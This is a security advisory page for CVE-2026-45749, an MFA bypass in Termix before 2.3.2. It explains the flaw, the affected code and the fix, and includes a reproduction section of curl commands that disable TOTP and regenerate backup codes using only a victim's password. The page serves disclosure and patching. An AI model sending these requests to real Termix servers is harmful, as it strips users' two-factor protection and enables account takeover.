VYPR
← All advisories
High severity8.1NVD Advisory· Published Jun 5, 2026· Updated Jun 5, 2026

CVE-2026-45749

CVE-2026-45749

Description

Termix versions prior to 2.3.2 allow disabling MFA or regenerating backup codes using only a user's password, bypassing two-factor authentication.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Termix versions prior to 2.3.2 allow disabling MFA or regenerating backup codes using only a user's password, bypassing two-factor authentication.

Vulnerability

Termix, a web-based server management platform, contains a vulnerability in its POST /users/totp/disable and POST /users/totp/backup-codes endpoints. Versions prior to 2.3.2 incorrectly accept the account password as the sole authentication factor for these multi-factor authentication (MFA) critical operations. The vulnerability resides in src/backend/database/routes/users.ts [1].

Exploitation

An attacker who has obtained a user's password, through methods such as phishing or credential stuffing, can exploit this vulnerability. The attacker needs only the user's password and network access to the Termix platform. By sending a POST request to either the /users/totp/disable or /users/totp/backup-codes endpoint with the user's password, the attacker can proceed without needing the user's TOTP device or a valid TOTP code [1].

Impact

Successful exploitation allows an attacker to completely disable Two-Factor Authentication (2FA) for a user or regenerate their backup codes, thereby invalidating previous codes. This effectively renders the MFA protection useless, granting the attacker the same access and privileges as the compromised user without requiring the second factor of authentication [1].

Mitigation

Termix version 2.3.2 addresses this vulnerability. Users are strongly advised to update to version 2.3.2 or later. No workarounds are specified, and the vulnerability is not listed as being part of the Known Exploited Vulnerabilities (KEV) catalog at this time [2].

References
  1. TOTP two-factor authentication can be disabled or bypassed using only the account password
  2. Release release-2.3.2 · Termix-SSH/Termix

AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Termix SSH/Termixreferences2 versions
    (expand)+ 1 more
    • (no CPE)
    • (no CPE)range: <2.3.2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `POST /users/totp/disable` and `POST /users/totp/backup-codes` endpoints incorrectly accept only the user's password as sufficient authentication for critical MFA operations."

Attack vector

An attacker who obtains a user's password can exploit this vulnerability. The attacker sends a POST request to either the `/users/totp/disable` or `/users/totp/backup-codes` endpoint, providing only the victim's password in the request body. This bypasses the need for a valid TOTP code or possession of the TOTP device, allowing the attacker to disable two-factor authentication or regenerate backup codes. [ref_id=1]

Affected code

The vulnerability resides in the `src/backend/database/routes/users.ts` file, specifically within the `POST /users/totp/disable` (lines 3076–3133) and `POST /users/totp/backup-codes` (lines 3167–3219) route handlers. These sections contain logic that accepts a password as a sole authentication factor for disabling TOTP or regenerating backup codes. [ref_id=1]

What the fix does

Version 2.3.2 modifies the authentication logic for sensitive endpoints. Previously, the application would accept either a password or a TOTP code. The fix enforces that both a password and a valid TOTP code must be provided when TOTP is enabled to disable it or regenerate backup codes. This ensures that an attacker cannot bypass MFA using only the compromised password. [ref_id=1]

Preconditions

  • authThe attacker must know the victim user's password. [ref_id=1]
  • configThe victim user must have TOTP two-factor authentication enabled. [ref_id=1]

Reproduction

# Attack 1: Disable TOTP with password only ```bash # Confirm TOTP is currently enabled curl -s -b cookies.txt http://<TERMIX_HOST>:30001/users/me # {"userId":"...","username":"victim_mfa","totp_enabled":true}

# Disable TOTP — only the password, no TOTP code curl -s -b cookies.txt -X POST http://<TERMIX_HOST>:30001/users/totp/disable \ -H "Content-Type: application/json" \ -d '{"password":"V1ctim!Secure"}' # {"message":"TOTP disabled successfully"}

# Confirm TOTP is now disabled curl -s -b cookies.txt http://<TERMIX_HOST>:30001/users/me # {"userId":"...","username":"victim_mfa","totp_enabled":false}

# Login again — no TOTP prompt, full access curl -s -X POST http://<TERMIX_HOST>:30001/users/login \ -H "Content-Type: application/json" \ -d '{"username":"victim_mfa","password":"V1ctim!Secure"}' # {"success":true,"is_admin":false,"username":"victim_mfa"} ```

# Attack 2: Regenerate backup codes with password only ```bash # With a valid session and TOTP enabled: curl -s -b cookies.txt -X POST http://<TERMIX_HOST>:30001/users/totp/backup-codes \ -H "Content-Type: application/json" \ -d '{"password":"V1ctim!Secure"}' # {"backup_codes":["65S6YXGA","K79NBYYZ","NPWPLBVI",...]}} ``` [ref_id=1]

Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

1